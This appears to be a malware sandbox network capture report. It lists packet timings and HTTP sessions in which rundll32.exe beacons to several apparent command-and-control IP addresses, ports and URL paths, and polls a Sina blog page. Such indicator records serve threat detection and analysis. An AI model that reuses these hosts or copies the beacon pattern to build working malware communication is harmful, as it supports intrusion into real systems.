                                                                                                                                          Dec 19, 2024 15:36:28.879812956 CET8057901116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:28.879837990 CET6036280192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:28.879859924 CET5790180192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:28.883018017 CET2358860254107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:28.893871069 CET6036123588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:28.893976927 CET6036280192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:29.014086008 CET2358860361107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:29.014234066 CET8060362116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:30.696933985 CET8060362116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:30.697074890 CET6036280192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:30.702667952 CET61403443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:30.702792883 CET44361403116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:30.702891111 CET61403443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:30.703542948 CET61403443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:30.703583956 CET44361403116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:32.537683964 CET44361403116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:32.537817955 CET61403443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:32.538503885 CET44361403116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:32.538578033 CET61403443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:32.676772118 CET6036123588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:32.676810980 CET6025423588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:32.688107967 CET6263523588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:32.807842970 CET2358862635107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:32.807919979 CET6263523588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:56.993143082 CET5931323588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:56.993324041 CET8056892116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:56.993376017 CET5931480192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:56.993376017 CET5689280192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:56.995450974 CET5931480192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:57.112663031 CET2358859313107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:57.114882946 CET8059314116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:58.732543945 CET8059314116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:58.732633114 CET5931480192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:58.741523981 CET60620443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:58.741627932 CET44360620116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:58.741710901 CET60620443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:58.743642092 CET60620443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:58.743674994 CET44360620116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:37:00.649457932 CET44360620116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:37:00.649578094 CET60620443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:37:00.650234938 CET44360620116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:37:00.650386095 CET60620443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:37:00.876746893 CET5923123588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:37:00.876780987 CET5931323588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:37:00.877686977 CET6195223588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:37:00.997287035 CET2358861952107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:37:00.997387886 CET6195223588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:37:00.998501062 CET6195223588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:37:01.103604078 CET6204523588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:37:01.118195057 CET2358861952107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:37:01.223381996 CET2358862045107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:37:01.223460913 CET6204523588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:37:01.225375891 CET6204523588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:37:01.345917940 CET2358862045107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:37:02.536020041 CET60620443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:37:02.536134958 CET44360620116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:37:02.536293030 CET60620443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:37:02.650284052 CET5931480192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:37:02.650924921 CET6237780192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:37:02.770680904 CET8059314116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:37:02.770776033 CET5931480192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:37:02.773611069 CET8062377116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:37:02.773919106 CET6237780192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:37:02.775393009 CET6237780192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:37:02.895032883 CET8062377116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:37:04.473983049 CET8062377116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:37:04.474073887 CET6237780192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:37:04.488447905 CET63551443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:37:04.488523960 CET44363551116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:37:04.488626003 CET63551443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:37:04.489355087 CET63551443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:37:04.489373922 CET44363551116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:37:05.001203060 CET6204523588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:37:05.001243114 CET63551443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:37:05.001270056 CET6195223588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:37:05.001990080 CET6379023588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:37:05.118150949 CET6380923588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:37:05.118236065 CET6237780192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:37:05.118426085 CET6381080192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:37:05.121505976 CET2358863790107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:37:05.121602058 CET6379023588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:37:05.121875048 CET6379023588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:37:05.239053011 CET2358863809107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:37:05.239121914 CET8063810116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:37:05.239130974 CET6380923588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:37:05.239132881 CET8062377116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:37:05.239175081 CET6381080192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:37:05.239207029 CET6237780192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:37:05.239483118 CET6380923588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:37:05.239799976 CET6381080192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:37:05.241436958 CET2358863790107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:37:05.358922958 CET2358863809107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:37:05.359240055 CET8063810116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:37:06.982880116 CET8063810116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:37:06.983025074 CET6381080192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:37:07.216377974 CET64603443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:37:07.216437101 CET44364603116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:37:07.217262983 CET64603443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:37:07.218295097 CET64603443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:37:07.218308926 CET44364603116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:37:07.518572092 CET64603443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:37:07.518666983 CET6379023588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:37:07.518717051 CET6380923588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:37:07.645761013 CET6471523588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:37:07.648968935 CET6381080192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:37:07.649265051 CET6471780192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:37:07.655323029 CET6471823588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:37:07.766356945 CET2358864715107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:37:07.766583920 CET6471523588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:37:07.767843962 CET6471523588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:37:07.769457102 CET8064717116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:37:07.769547939 CET6471780192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:37:07.769594908 CET8063810116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:37:07.769650936 CET6381080192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:37:07.770389080 CET6471780192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:37:07.774921894 CET2358864718107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:37:07.775024891 CET6471823588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:37:07.775340080 CET6471823588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:37:07.887434006 CET2358864715107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:37:07.889822006 CET8064717116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:37:07.894954920 CET2358864718107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:37:09.575462103 CET8064717116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:37:09.575587034 CET6471780192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:37:09.591331959 CET49251443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:37:09.591382027 CET44349251116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:37:09.591630936 CET49251443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:37:09.683914900 CET49251443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:37:09.683934927 CET44349251116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:37:11.554908991 CET44349251116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:37:11.555066109 CET49251443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:37:11.555706024 CET44349251116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:37:11.555982113 CET49251443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:37:11.642376900 CET6471523588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:37:11.642579079 CET6471823588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:37:11.643481016 CET5054323588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:37:11.765625000 CET2358850543107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:37:11.765700102 CET5054323588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:37:11.770831108 CET5054323588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:37:11.891180992 CET2358850543107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:37:12.004265070 CET5060823588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:37:12.124125957 CET2358850608107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:37:12.124205112 CET5060823588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:37:12.126693010 CET5060823588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:37:12.246392012 CET2358850608107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:37:13.573978901 CET49251443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:37:13.574076891 CET44349251116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:37:13.574321985 CET44349251116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:37:13.574399948 CET49251443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:37:13.574399948 CET49251443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:37:13.719305038 CET6471780192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:37:13.719660044 CET5163280192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:37:13.839224100 CET8051632116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:37:13.839306116 CET5163280192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:37:13.839375973 CET8064717116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:37:13.839441061 CET6471780192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:37:13.840508938 CET5163280192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:37:13.960167885 CET8051632116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:37:15.634984970 CET8051632116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:37:15.635195017 CET5163280192.168.2.5116.133.8.92
                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                                                                                                          • blog.sina.com.cn
                                                                                                                                          • 107.160.131.253:18659
                                                                                                                                          • 107.163.56.110:18530
                                                                                                                                          • 107.160.131.254:23588
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49718 | 107.160.131.253 | 18659 | 5400 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:33:17.452064037 CET | 171 | OUT | GET //joy.asp?sid=rungnejcntCWrem5Fe5vteX8v2LUicbtudb8mtiWmtaWndm@ HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible)
                                                                                                                                          Host: 107.160.131.253:18659
                                                                                                                                          Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49719 | 107.163.56.110 | 18530 | 5400 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:33:17.452320099 CET | 185 | OUT | GET /u1129.html HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.163.56.110:18530
                                                                                                                                          Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49792 | 107.160.131.254 | 23588 | 5400 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:33:43.586338043 CET | 187 | OUT | GET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 49794 | 107.160.131.254 | 23588 | 5400 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:33:43.586730957 CET | 187 | OUT | GET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.5 | 49814 | 107.160.131.254 | 23588 | 5400 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:33:45.629937887 CET | 187 | OUT | GET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.5 | 49815 | 107.160.131.254 | 23588 | 5400 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:33:45.631921053 CET | 187 | OUT | GET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.5 | 49832 | 116.133.8.92 | 80 | 5400 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:33:47.392971039 CET | 118 | OUT | GET /u/5762479093 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Host: blog.sina.com.cn
Dec 19, 2024 15:33:49.117685080 CET | 371 | IN | HTTP/1.1 302 Moved Temporarily
Server: nginx/1.2.8
Date: Thu, 19 Dec 2024 14:33:48 GMT
Content-Type: text/html
Content-Length: 160
Connection: keep-alive
Location: https://blog.sina.com.cn/u/5762479093
Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.5 | 49857 | 107.160.131.254 | 23588 | 5400 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:33:49.679462910 CET | 187 | OUT | GET /article.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
Host: 107.160.131.254:23588
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.5 | 49859 | 107.160.131.254 | 23588 | 5400 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:33:49.928164005 CET | 187 | OUT | GET /article.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
Host: 107.160.131.254:23588
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.5 | 49860 | 116.133.8.92 | 80 | 5400 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:33:49.928282976 CET | 118 | OUT | GET /u/5762479093 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Host: blog.sina.com.cn


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.5 | 49897 | 107.160.131.254 | 23588 | 5400 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:33:53.697033882 CET | 187 | OUT | GET /article.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
Host: 107.160.131.254:23588
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.5 | 49899 | 116.133.8.92 | 80 | 5400 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:33:53.818470955 CET | 118 | OUT | GET /u/5762479093 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Host: blog.sina.com.cn
Dec 19, 2024 15:33:56.329720974 CET | 371 | IN | HTTP/1.1 302 Moved Temporarily
Server: nginx/1.2.8
Date: Thu, 19 Dec 2024 14:33:56 GMT
Content-Type: text/html
Content-Length: 160
Connection: keep-alive
Location: https://blog.sina.com.cn/u/5762479093
Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.5 | 49900 | 107.160.131.254 | 23588 | 5400 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:33:53.818614960 CET | 187 | OUT | GET /article.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
Host: 107.160.131.254:23588
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.5 | 49938 | 107.160.131.254 | 23588 | 5400 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:33:57.912029982 CET | 187 | OUT | GET /article.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
Host: 107.160.131.254:23588
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.5 | 49943 | 107.160.131.254 | 23588 | 5400 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:33:58.177066088 CET | 187 | OUT | GET /article.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
Host: 107.160.131.254:23588
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.5 | 49944 | 116.133.8.92 | 80 | 5400 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:33:58.177181959 CET | 118 | OUT | GET /u/5762479093 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Host: blog.sina.com.cn


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.5 | 49980 | 107.160.131.254 | 23588 | 5400 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:34:02.044260025 CET | 187 | OUT | GET /article.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
Host: 107.160.131.254:23588
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.5 | 49982 | 107.160.131.254 | 23588 | 5400 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:34:02.158725023 CET | 187 | OUT | GET /article.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
Host: 107.160.131.254:23588
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.5 | 49983 | 116.133.8.92 | 80 | 5400 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:34:02.159209013 CET | 118 | OUT | GET /u/5762479093 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Host: blog.sina.com.cn
Dec 19, 2024 15:34:03.882188082 CET | 371 | IN | HTTP/1.1 302 Moved Temporarily
Server: nginx/1.2.8
Date: Thu, 19 Dec 2024 14:34:03 GMT
Content-Type: text/html
Content-Length: 160
Connection: keep-alive
Location: https://blog.sina.com.cn/u/5762479093
Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.5 | 50026 | 107.160.131.254 | 23588 | 5400 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:34:06.062958956 CET | 187 | OUT | GET /article.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
Host: 107.160.131.254:23588
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.5 | 50028 | 107.160.131.254 | 23588 | 5400 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:34:06.170423985 CET | 187 | OUT | GET /article.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
Host: 107.160.131.254:23588
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.5 | 50029 | 116.133.8.92 | 80 | 5400 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:34:06.185621977 CET | 118 | OUT | GET /u/5762479093 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Host: blog.sina.com.cn
Dec 19, 2024 15:34:07.900721073 CET | 371 | IN | HTTP/1.1 302 Moved Temporarily
Server: nginx/1.2.8
Date: Thu, 19 Dec 2024 14:34:07 GMT
Content-Type: text/html
Content-Length: 160
Connection: keep-alive
Location: https://blog.sina.com.cn/u/5762479093
Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.5 | 50072 | 107.160.131.254 | 23588 | 5400 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:34:10.077888966 CET | 187 | OUT | GET /article.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
Host: 107.160.131.254:23588
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.5 | 50073 | 116.133.8.92 | 80 | 5400 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:34:10.211318970 CET | 118 | OUT | GET /u/5762479093 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Host: blog.sina.com.cn
Dec 19, 2024 15:34:11.998063087 CET | 371 | IN | HTTP/1.1 302 Moved Temporarily
